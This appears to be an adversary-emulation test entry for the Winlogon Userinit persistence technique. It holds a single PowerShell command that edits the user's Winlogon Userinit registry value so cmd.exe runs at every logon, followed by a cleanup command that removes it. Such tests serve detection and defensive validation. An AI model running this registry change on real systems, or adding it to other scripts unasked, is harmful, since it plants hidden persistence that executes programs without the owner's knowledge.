#TechniqueName: Boot or Logon Autostart Execution: Winlogon Helper DLL
#AtomicTestName: Winlogon Userinit Key Persistence - PowerShell
#Description: PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.&&Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.&
#Language: ps1

#commands
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, C:\Windows\System32\cmd.exe" -Force


#cleanup_commands
Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore

